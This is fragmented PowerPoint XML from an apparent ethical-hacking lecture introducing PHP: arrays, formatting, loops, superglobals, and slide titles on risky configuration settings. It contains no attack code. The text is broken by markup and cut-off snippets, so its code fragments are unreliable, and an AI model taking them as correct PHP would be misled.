              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Constants use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define(name, value[,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dirty="0"/>
              <a:t>where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4000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>for ignoring case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constants do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start with a $ and they’re global, immutable</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Five magic constants: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__LINE__, __FILE__, __DIR__, __CLASS__, __METHOD__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Five ways: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$lamp = array(); $lamp[]='LINUX'; $lamp[]='Apache'; $lamp[]='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'; $lamp[]='PHP'; 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$lamp = array('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LINUX','Apache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MySQL','PHP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$lamp = array(); $lamp[1]='LINUX';$lamp[2]='Apache'; $lamp[3]='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';$lamp[4]='PHP';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$lamp = array(); $lamp['L']='LINUX';$lamp['A']='Apache'; $lamp['M']='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';$lamp['P']='PHP';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$lamp = array('L'=&gt;'LINUX','A'=&gt;'Apache', 'M'=&gt;'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MySQL','P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'=&gt;'PHP');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1" y="5021179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associative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416844" y="5029205"/>
            <a:ext cx="1114924" cy="192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6705602" y="5309937"/>
            <a:ext cx="826166" cy="320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14147" y="2438399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indexed from zero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5799222" y="2695438"/>
            <a:ext cx="1018675" cy="144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606721" y="2374234"/>
            <a:ext cx="1211174" cy="2646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/>
              <a:t>I dislike languages that have too many ways to do the same thing (think </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>perl</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>)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echo arg1[, arg2, …]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print arg1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   // human-readable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$arg1[, arg2, …])</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/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/>
              <a:t>Most of the C format </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>specifiers</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> work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('%d',23)                  23 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('%03d',23)                023 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('%.3f',3.141596)          3.142 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('%.3s','PHP Script')      PHP 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('%s%3d','Route',66)       Route 66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$s = ‘hi’;             // no variable expansion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$s = “hi”;		// variables are expanded</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>Can use HEREIS format (ugly!) a la bash</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>Functions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explode(), implode()</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1700" dirty="0"/>
              <a:t> [split and join in python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ltrim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rtrim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700" dirty="0"/>
              <a:t>[strip HTML and PHP tags],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ConditionA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Stmt;[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ConditionB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else Stmt; ][else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elseStmt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] </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1700" dirty="0"/>
              <a:t>Multiline Stmt code must be placed in braces, {}. The ; terminating each statement is obligatory – even if the next character is a closing brace.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>There is 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 statement</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1700" dirty="0"/>
              <a:t>The usual drill: use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dirty="0"/>
              <a:t> after each case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whileLoop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($num){ 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while ($num &gt; 0) {</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2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echo($num).'&lt;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&gt;'; </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2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$num--;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($num){ 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do{ echo($num).'&lt;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&gt;';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 $num--;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} while ($num &gt; 0);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($num){ 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for ($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=0;$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&lt;$num;$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 lvl="2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.'&lt;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&gt;';</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1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4000" dirty="0"/>
              <a:t> causes immediate termination of the loop. Loop statements after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4000" dirty="0"/>
              <a:t> are skipped and the next execution of the loop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0489" y="1568440"/>
            <a:ext cx="5257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function foreachLoopA(){ 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  foreach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($GLOBALS as $key =&gt; $value) {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     echo $key.'='.$value.'&lt;br&gt;';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foreachLoopB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  foreach($_SERVER as $value) echo $value.'&lt;br&gt;';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dirty="0" err="1"/>
              <a:t>Globals</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>, always visible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2169691"/>
          <a:ext cx="8153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$GLOBALS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below in a one array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$_SERVER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GET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$_POST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POST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file upload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$_SESSION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$_ENV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$_COOKIE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cookies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executes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as PHP code</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>what if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user-supplied?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4" y="3253250"/>
            <a:ext cx="7747000" cy="1689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77627</TotalTime>
  <Words>2244</Words>
  <Application>Microsoft Macintosh PowerPoint</Application>
  <PresentationFormat>On-screen Show (4:3)</PresentationFormat>
  <Paragraphs>248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Ethical Hacking – Lecture 13</vt:lpstr>
      <vt:lpstr>PHP – The Language</vt:lpstr>
      <vt:lpstr>More PHP </vt:lpstr>
      <vt:lpstr>PHP arrays</vt:lpstr>
      <vt:lpstr>Output and formatting</vt:lpstr>
      <vt:lpstr>Strings and Conditionals</vt:lpstr>
      <vt:lpstr>Loops</vt:lpstr>
      <vt:lpstr>Super Globals, always visible</vt:lpstr>
      <vt:lpstr>Danger!</vt:lpstr>
      <vt:lpstr>More Danger!</vt:lpstr>
      <vt:lpstr>Or just turn this stuff off?!</vt:lpstr>
      <vt:lpstr>phpinfo()</vt:lpstr>
      <vt:lpstr>PHP modules (compiled in)</vt:lpstr>
      <vt:lpstr>Configuring PHP</vt:lpstr>
      <vt:lpstr>register_globals</vt:lpstr>
      <vt:lpstr>allow_url_fopen (On by default)</vt:lpstr>
      <vt:lpstr>open_basedir (unset by default)</vt:lpstr>
      <vt:lpstr>PHP Session Management</vt:lpstr>
      <vt:lpstr>Session Management (cont)</vt:lpstr>
      <vt:lpstr>session.referer_check</vt:lpstr>
      <vt:lpstr>The (in)famous Safe Mode</vt:lpstr>
      <vt:lpstr>More Safe Mode</vt:lpstr>
      <vt:lpstr>Magic Quotes (removed in PHP 5.4)</vt:lpstr>
      <vt:lpstr>The 3 faces of PHP</vt:lpstr>
      <vt:lpstr>Where are we?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1917</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2006-08-16T00:00:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2020-11-20T16:40:59Z</dcterms:modified>
</cp:coreProperties>
</file>